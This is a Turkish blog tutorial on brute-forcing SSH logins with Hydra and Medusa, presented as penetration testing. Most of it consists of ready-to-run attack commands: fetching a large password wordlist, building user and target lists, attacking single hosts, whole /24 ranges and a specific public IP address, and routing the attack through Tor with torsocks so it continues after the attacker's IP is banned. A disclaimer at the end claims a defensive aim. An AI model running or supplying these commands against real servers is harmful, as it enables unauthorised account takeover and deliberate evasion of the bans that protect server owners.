1.338 defa okundu.

SSH Penetration Testi

ibrahim   12 Ağustos 2016   Yorum yok SSH Penetration Testi

Merhaba Arkadaşlar,

Bu makalemde sizlere Hydra ve Medusa ile SSH saldırısı yapmayı anlatacağım bu işlem tamamen penetration testi için yazılmıştır.

Arkadaşlar ilk öncelikle hydra üzerinde atak yapmayı anlatacağım sonrasında medusa ile atak yapmayı ve ayrıca tor ile çalışmasından bahsedeceğim.

Hydra üzerinden sizlere ilk önce dosya oluşturarak atak yapmayı sonrasında ise manual olarak atak yapma komutlarından bahsedeceğim.

Hydra ile dosya oluşturarak SSH atak yapma;

A) ilk öncelikle atak işlemlerinde en önemli olan şifre denemesidir. Dünya listesi olarak 1.707.467 şifre denemesi yapabilmeniz için sitemizden http://centosblog.net/passwd.txt sekmesinden indirebilirsiniz. Not: İndirme işlemini /root/ dizini yada hatırlayabileceğiniz bir dizine indirin. İndirme işlemi için aşağıdaki komutu kullanabilirsiniz.

cd root/
wget centosblog.net/passwd.txt

İsterseniz şifrelerde oynama yapabilirsiniz kendinizde bu dünya listesini geliştirebilirsiniz.  Geliştirmek için şu komutu yazıp satır, satır derlemeniz yeterli olacaktır.

nano /root/passwd.txt

Karşınıza şu şekilde bir örnek ekran çıkacak;

B) Diğer bir kısım ise hangi kullanıcılar üzerinde atak yapılması gerektiğidir. Bunun için aşağıda sizlere root/ dizini altında user.txt dosyası oluşturduk dan sonra içerisine atak yapmak istediğimiz kullanıcıları yazacağız.

1. Dosya oluşturma;
cd /root/
touch user.txt

2. Dosyayı açıp içerisine atak yapılmasını istediğimiz kullanıcı adlarını yazacağız.
nano root/user.txt

2.1 Dosyamız açıldı ve içerisine istediğimiz kullanıcı adlarını yazacağız örnek;

C) Son olarak atak yapılmasını istediğimiz ip adresleri ve portlar için /root/ dizini altında server.txt dosyası oluşturuyoruz.

1. Dosya oluşturma;
cd root/
touch server.txt

2. Dosyayı açıp içerisine atak yapılmasını istediğimiz ip adreslerini yazacağız.
nano root/server.txt

2.1 Dosyamız açıldı ve içerisine istediğimiz ip adreslerini yazacağız örnek;

Artık hazırlığımız tamamlanmış olup atak yapma işlemimiz kalmış oldu. Aşağıdaki komut ile atak işlemimiz başlamış oldu ve ssh şifre deneme işlemi başlamış devamlı login istekleri gitmeye başlanmış oluyor.

hydra -L /root/user.txt -P /root/passwd.txt -M /root/server.txt ssh

Atak yapmış olduğunuz sunucu ipsi banlandıysa atağınızı tor ile devam edebilirsiniz.

Tor kurma ve kullanma için aşağıdaki makalemizden destek alabilirsiniz ve kurulumdan sonra aşağıdaki komut ile saldırıya devam edebilirsiniz.

Kali Linux Tor Yükleme ve Kullanımı (üzerine tıklamanız durumunda yan sekmede açılacaktır)

torsocks hydra -L /root/user.txt -P /root/passwd.txt -M /root/server.txt ssh


Hydra ile SSH manual atak yapma;

A) Aşağıdaki komutlar ile birlikte tek ip üzerine tek şifre ve tek kullanıcı adına atak yapmış olacağız.

hydra -p 1q2w3e4r -l root ssh://192.168.1.1

A.1) Aşağıdaki komutlar ile birlikte ip block üzerine tek şifre ve tek kullanıcı adına atak yapmış olacağız.

hydra -p 1q2w3e4r -l root ssh://192.168.1.1/24

B) Aşağıdaki komut ile ip adresi ve port dosyasını oluşturduğumuz server.txt dosyası haricinde diğerlerini manual olarak yazarak atak yapma işlemini gerçekleştireceğiz.

hydra -p 1q2w3e4r -l root -M root/server.txt ssh

C) Aşağıdaki komut ile indirdiğimiz dünya şifre listesi passwd.txt dosyası haricinde diğerlerini manual olarak yazarak atak yapma işlemini gerçekleştireceğiz.

hydra -P root/passwd.txt -l root ssh://192.168.1.1

C.1)  Aşağıdaki komutlar ile birlikte ip block üzerine indirdiğimiz dünya şifre listesi passwd.txt dosyası haricinde diğerlerini manual olarak yazarak atak yapma işlemini gerçekleştireceğiz.

hydra -P root/passwd.txt -l root ssh://192.168.1.1/24

Not: Atak işlemlerimizi tortorsocks ” ile yaptığımızda kendi ipmiz banlansa bile farklı ipler üzerinden atak işlemine devam edebiliriz. Ayrıca atak işleminiz başarılı olursa aşağıdaki örnek ekran görüntüsü ile alacaksınız;

Medusa üzerinden SSH atak işlemleri;

Yukarıda yapılan işlemler aslında medusa’da, da aynı şekilde geçerlidir sadece birkaç komut değişikliği vardır. Sizlere medusa üzerinden SSH atak için bir kaç örnek kodlar vereceğim zaten yukarıdaki anlatım sonrası medusa üzerinde yazılan kodları kolaylıkla anlaya bileceksiniz. O yüzden detay anlatmadan sadece komutlar yazacağım size.

medusa -h 185.124.87.76 -u root -P root/passwd.txt -M ssh
medusa -H root/sshserver.txt -u root -P root/passwd.txt -n 22 -M ssh

Ayrıca sizlere medusa üzerinde kullandığım ve kullanabileceğiniz komutlardan bahsetmek istiyorum komutlar ve kullanım şekilleri aşağıdaki gibi;

-h  Hostname / ip olarak geçiyor bunu -H  olarak yaparsanız dosya ile tarama yaparsınız -H /root/server.txt  gibi.

-M Modül seçimi yapıyorsunuz örneğin SSH olarak varsayımda -H ssh modülleri görüntülemek için medusa -d komutunu yazmanız ve oradaki bir modülü kullanmanız yeterli olacaktir.

-n Port numarasını belirliyoruz örnek olarak -n 22

-P  Şifre dosyasını seçiyoruz bunu -p olarak girersek manual olarak yazmamız gerekir örnekler; -P root/passwd.txt  & -p 1q2w3e4r

medusa’ya ait diğer komutlar aşağıdaki gibidir;

Konu Hakkında Yazar ve Editör Tarafından Önemli Açıklama;

Yukarıda verilen bilgi tamamen Penetration testi için amaçlanmıştır. Saldırı tipleri ufak çaplı olarak yazılımış olup saldırı boyutu yükseltme veya saldırılar hakkında detaylı açıklama bulunmamaktadır. Sunucu veri güvenliği yükseltme ve atak yakalama tespiti için yazılmıştır. Konu hakkında centosblog.net yönetimi olarak her hangi bir sorumluluk almamaktadır.

Bir Başka Makalede Görüşmek Üzere Hoşça Kalın 🙂

Alakasız içerikÇalışmıyorAradığım içerik ama eksikleri varÇalışıyorHarika (Henüz Oy Verilmedi)

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir